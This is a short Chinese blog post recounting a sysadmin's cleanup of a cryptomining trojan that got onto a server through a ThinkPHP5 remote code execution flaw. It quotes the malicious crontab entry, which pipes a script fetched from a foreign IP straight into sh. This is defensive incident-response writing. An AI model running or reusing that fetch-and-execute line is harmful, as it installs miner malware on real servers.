记得一次木马清除经验:处理thinkphp5挖矿远程代码执行漏洞木马??昨天发现一台服务器突然变慢,top显示有几个进程占用CPU超过100%。执行命令为:/tmp/php-s/tmp/p2.conf基本确认是马了。下一步是最后确定来源。没有登录记录。首先杀死这些进程,但几分钟后它会重新出现。让我们看看这个木马想用netstat做什么。看到这个木马开了一个端口,和国外的ip建立了连接,但是tcpdump一会没发现有数据传输,他想干什么?继续查看日志。在cron日志中发现www用户有crontab定时运行。这基本上就是问题wget-q-O-http://83.220.169.247/cr3.sh|sh>/dev/null2>&1Shun下载了几个问题,一看应该是挖矿木马程序。服务器上的www用户是通过安装lnmp创建的。看了源头,很有可能是web漏洞。查看/tmp下php的权限,也就是www。查看lnmp下几个站点的日志,发现是利用了thinkphp5最近发布的远程代码执行漏洞。漏洞详情:https://nosec.org/home/detail...修复,解决问题,但是这个site为测试站点,监听端口为8083,黑客现在可以开始嗅探非常规端口了吗?来源:https://www.simapple.com/425....
